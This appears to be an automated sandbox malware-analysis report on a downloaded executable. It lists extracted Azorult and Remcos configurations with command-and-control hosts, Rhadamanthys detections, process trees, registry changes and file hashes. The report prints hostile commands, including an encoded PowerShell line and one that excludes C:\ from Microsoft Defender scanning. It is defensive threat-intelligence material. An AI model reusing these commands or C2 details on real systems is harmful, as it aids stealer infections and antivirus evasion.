Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
20-03-2023 15:06
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://cointra.ac.ug/ghjk.exe
Resource
win10v2004-20230220-en
General
-
Target
http://cointra.ac.ug/ghjk.exe
Malware Config
Extracted
azorult
http://195.245.112.115/index.php
Extracted
remcos
03162023
nikahuve.ac.ug:65213
kalskala.ac.ug:65213
tuekisaa.ac.ug:65213
parthaha.ac.ug:65213
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
revcs.exe
-
copy_folder
sdf
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
vgcqfxs.dat
-
keylog_flag
false
-
keylog_folder
fsscbas
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
fdvcmhjdf-Z4BK1G
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remvc
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Detect rhadamanthys stealer shellcode 5 IoCs
Processes:
resource yara_rule behavioral1/memory/4440-196-0x00000000010F0000-0x000000000110C000-memory.dmp family_rhadamanthys behavioral1/memory/4440-198-0x00000000010F0000-0x000000000110C000-memory.dmp family_rhadamanthys behavioral1/memory/4440-200-0x0000000002E40000-0x0000000003E40000-memory.dmp family_rhadamanthys behavioral1/memory/4440-201-0x00000000010F0000-0x000000000110C000-memory.dmp family_rhadamanthys behavioral1/memory/4440-208-0x00000000010F0000-0x000000000110C000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ghjk.exeCE7B.tmp.exeD89F.tmp.exeCE7B.tmp.exeD449.tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation ghjk.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation CE7B.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation D89F.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation CE7B.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation D449.tmp.exe -
Executes dropped EXE 10 IoCs
Processes:
ghjk.exeghjk.exeCE7B.tmp.exeD449.tmp.exeCE7B.tmp.exeD89F.tmp.exeD449.tmp.exeD449.tmp.exeD449.tmp.exeD89F.tmp.exepid process 3580 ghjk.exe 4440 ghjk.exe 1376 CE7B.tmp.exe 3968 D449.tmp.exe 2848 CE7B.tmp.exe 3644 D89F.tmp.exe 1880 D449.tmp.exe 4672 D449.tmp.exe 220 D449.tmp.exe 4472 D89F.tmp.exe -
Loads dropped DLL 4 IoCs
Processes:
CE7B.tmp.exepid process 2848 CE7B.tmp.exe 2848 CE7B.tmp.exe 2848 CE7B.tmp.exe 2848 CE7B.tmp.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
D89F.tmp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Picxpsdvu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Omsae\\Picxpsdvu.exe\"" D89F.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
ghjk.exepid process 4440 ghjk.exe 4440 ghjk.exe 4440 ghjk.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
ghjk.exeCE7B.tmp.exeD449.tmp.exeD449.tmp.exeD89F.tmp.exedescription pid process target process PID 3580 set thread context of 4440 3580 ghjk.exe ghjk.exe PID 1376 set thread context of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 3968 set thread context of 1880 3968 D449.tmp.exe D449.tmp.exe PID 4672 set thread context of 220 4672 D449.tmp.exe D449.tmp.exe PID 3644 set thread context of 4472 3644 D89F.tmp.exe D89F.tmp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhost.exeCE7B.tmp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CE7B.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CE7B.tmp.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 336 timeout.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 575ec7859e45d901 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{22AE3A8E-C739-11ED-B7D7-D660CAC54930} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31021893" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{46D2B7B6-D3AE-4B80-971F-D34D074EDEE1}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c884d0db6b01394f84d012a5eedc1d2d0000000002000000000010660000000100002000000096693716ca883e4f77bd43988dcc8905a50bae4a79d32cf29e091e7f87007f7d000000000e80000000020000200000005787eab927c912eabe52e11471079990f4477f40533500950c881920b7f537d820000000183a21c73461d29857e64227568618e8486f795489db24550194a9507849068240000000f8189ab10c5960605ffa51c02ae1541686253db5618cbe96ff0f59cdd55b67562a59540ee9103bb9809d43296974400dc62a1404cd8381b4b81e49ad670f48cc iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "386093349" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31021893" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4154176178" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c884d0db6b01394f84d012a5eedc1d2d000000000200000000001066000000010000200000009663606e205f85711b1ad0e2d380f983451f99f297095af23f41f5d6f0d799a3000000000e8000000002000020000000ca7292f537b2cfa1fbf3018e66a469963bb753aab6d9cdfc5dccb9885b57e454200000002ecd5a225d5622435681efc28d01d95f97514fc49aeaec51553866ea4d67393940000000550c8e9ee92c3f5037ed4c87489371fbcf8f9f03d8d3bb59b5166846ce54387831234818f2804a8dcb4f82a3c0ed25d8a97b39053efa01edbc7456c3d1c0a126 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 409074f8455bd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4154176178" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f08993f8455bd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exeghjk.exedllhost.exepowershell.exeCE7B.tmp.exepowershell.exepowershell.exeD449.tmp.exepid process 2316 powershell.exe 2316 powershell.exe 2316 powershell.exe 4440 ghjk.exe 4440 ghjk.exe 3932 dllhost.exe 3932 dllhost.exe 3932 dllhost.exe 3932 dllhost.exe 2108 powershell.exe 2848 CE7B.tmp.exe 2848 CE7B.tmp.exe 2108 powershell.exe 2336 powershell.exe 2336 powershell.exe 3940 powershell.exe 3940 powershell.exe 220 D449.tmp.exe 220 D449.tmp.exe 220 D449.tmp.exe 220 D449.tmp.exe 220 D449.tmp.exe 220 D449.tmp.exe 220 D449.tmp.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeghjk.exeCE7B.tmp.exeD449.tmp.exepowershell.exeD449.tmp.exepowershell.exeD449.tmp.exeD89F.tmp.exepowershell.exeD449.tmp.exedescription pid process Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 3580 ghjk.exe Token: SeDebugPrivilege 1376 CE7B.tmp.exe Token: SeDebugPrivilege 3968 D449.tmp.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 1880 D449.tmp.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 4672 D449.tmp.exe Token: SeDebugPrivilege 3644 D89F.tmp.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 220 D449.tmp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 4208 iexplore.exe 4208 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
iexplore.exeIEXPLORE.EXED89F.tmp.exepid process 4208 iexplore.exe 4208 iexplore.exe 2808 IEXPLORE.EXE 2808 IEXPLORE.EXE 4472 D89F.tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exeghjk.exeghjk.exeCE7B.tmp.exeD89F.tmp.exeD449.tmp.exeCE7B.tmp.execmd.exeD449.tmp.exeD449.tmp.execmd.exedescription pid process target process PID 4208 wrote to memory of 2808 4208 iexplore.exe IEXPLORE.EXE PID 4208 wrote to memory of 2808 4208 iexplore.exe IEXPLORE.EXE PID 4208 wrote to memory of 2808 4208 iexplore.exe IEXPLORE.EXE PID 4208 wrote to memory of 3580 4208 iexplore.exe ghjk.exe PID 4208 wrote to memory of 3580 4208 iexplore.exe ghjk.exe PID 4208 wrote to memory of 3580 4208 iexplore.exe ghjk.exe PID 3580 wrote to memory of 2316 3580 ghjk.exe powershell.exe PID 3580 wrote to memory of 2316 3580 ghjk.exe powershell.exe PID 3580 wrote to memory of 2316 3580 ghjk.exe powershell.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe PID 4440 wrote to memory of 3932 4440 ghjk.exe dllhost.exe PID 4440 wrote to memory of 3932 4440 ghjk.exe dllhost.exe PID 4440 wrote to memory of 3932 4440 ghjk.exe dllhost.exe PID 4440 wrote to memory of 3932 4440 ghjk.exe dllhost.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe PID 3644 wrote to memory of 2108 3644 D89F.tmp.exe powershell.exe PID 3644 wrote to memory of 2108 3644 D89F.tmp.exe powershell.exe PID 3644 wrote to memory of 2108 3644 D89F.tmp.exe powershell.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe PID 2848 wrote to memory of 1808 2848 CE7B.tmp.exe cmd.exe PID 2848 wrote to memory of 1808 2848 CE7B.tmp.exe cmd.exe PID 2848 wrote to memory of 1808 2848 CE7B.tmp.exe cmd.exe PID 1808 wrote to memory of 336 1808 cmd.exe timeout.exe PID 1808 wrote to memory of 336 1808 cmd.exe timeout.exe PID 1808 wrote to memory of 336 1808 cmd.exe timeout.exe PID 1880 wrote to memory of 2336 1880 D449.tmp.exe powershell.exe PID 1880 wrote to memory of 2336 1880 D449.tmp.exe powershell.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe PID 3644 wrote to memory of 4484 3644 D89F.tmp.exe cmd.exe PID 3644 wrote to memory of 4484 3644 D89F.tmp.exe cmd.exe PID 3644 wrote to memory of 4484 3644 D89F.tmp.exe cmd.exe PID 4484 wrote to memory of 3940 4484 cmd.exe powershell.exe PID 4484 wrote to memory of 3940 4484 cmd.exe powershell.exe PID 4484 wrote to memory of 3940 4484 cmd.exe powershell.exe PID 3644 wrote to memory of 4472 3644 D89F.tmp.exe D89F.tmp.exe PID 3644 wrote to memory of 4472 3644 D89F.tmp.exe D89F.tmp.exe PID 3644 wrote to memory of 4472 3644 D89F.tmp.exe D89F.tmp.exe PID 3644 wrote to memory of 4472 3644 D89F.tmp.exe D89F.tmp.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://cointra.ac.ug/ghjk.exe1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4208 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"4⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe"C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exeC:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "CE7B.tmp.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe"C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D449.tmp.exeC:\Users\Admin\AppData\Local\Temp\D449.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe"C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exeC:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\D449.tmp.exeC:\Users\Admin\AppData\Roaming\D449.tmp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\D449.tmp.exeC:\Users\Admin\AppData\Roaming\D449.tmp.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\D449.tmp.exe.logFilesize
1KB
MD5cbe207895aa962105ca913568f7d2135
SHA1c62bcc9aac6f6ad0b14457d3d51c0a474528b106
SHA256bd468d112dd92eab9177b172cb46016d96c6d85fe567734852f8c07733c14a24
SHA5123a93a75b1c3a93d8466a7b2f5b0433805d7055e829834203b3b6ae48ecb899f3aaf68610057a0ce0f9a29647cd7c6577dcb4c89124dc368e91f5866a5dbf1e44
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exeFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
SHA51268467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exeFilesize
2.8MB
MD5688774feec1cc9685acaece804dc7a26
SHA168afac92caeb49c2bb96970138738844aa7b8f99
SHA256a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
